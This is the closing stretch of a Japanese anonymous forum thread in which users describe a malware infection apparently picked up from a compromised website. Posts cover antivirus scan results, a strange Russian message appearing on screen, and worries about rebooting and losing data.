スレが建った時ってまだ改竄前だったのかな？とも思うんだけどね
最初の方は誰も騒いでなかったし

notepadが勝手に起動したぞ！！！

>>977
クイックスキャンはしたんだが、とりあえず今フルスキャンかけた。

>>978
そうだったらいいんだけどな…。

VistaにAvast入れたけどメモリとスタートアップの検査しか
してくれないんだけどそういうソフトなのこれ？

>>978
なんか意図的に仕込んだというより感染者が知らないで閲覧してｾｷｭﾘﾃｨｰﾎｰﾙから拡がったくせーな

ｻｲﾄの中に異常に古くからあるとことか昨日更新したとことか

次スレはID:xLXP6C60の実況報告スレにしない？

何か貼り付けられた

Клин клином вышибают.
Поздравления

？？？

セッションがclose_waitになった。

>>982
該当ページはもう怖くて開けないけど、更新日時はいつになってるんだろう

>>985
待て
今Macで見てる

>>964,966
サンクス。
とりあえずクリーンインストールしてみる。

今終わったavastのフルスキャンで2つ検出された。
ファイルの名前　　　　　　　　　　　　　　　　　　　　　　　結果
C:\documents\(俺の名前)\daemon4091-x86.exe　　感染：Win32:Agent-AIIU [Trj]
C:\System Volume Information\...\A0155798.exe　　感染：Win32:Agent-AIIU [Trj]

>>984
ぐぐる翻訳
> 火災と、火災ファイト。
> 拝啓

>>984
辞書引いてみたが「ある一画は壊されています。おめでとう。」みたいな意味になった
多分順調にウイルス感染してるんじゃないの

更新日の表示はないね
ただ昨日ﾘﾘｰｽ出してる

>>987
ダエモンのは既知のスパイウェアだな

再起動したら二度と戻ってこられないような気がするんだけど

機動したままだとどんどん破壊されるんじゃない？

バックアップの外付け切断したからぶっ壊れても特に損害はない

>>990
thx

>>984
火災と、火災ファイト。
拝啓

って翻訳された

いつまでもあると思うな親とHDDの中身

バックアップは大切だお…

再起動も恐怖・・・・
これからが本当に地獄？

なんだ、また情弱XP厨だけ脂肪か？

再起動してくる

このスレッドは１０００を超えました。
もう書けないので、新しい職を探して下さい。。。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　ニュース速報
　　　　　　　　　　　　　　http://www.hellowork.go.jp/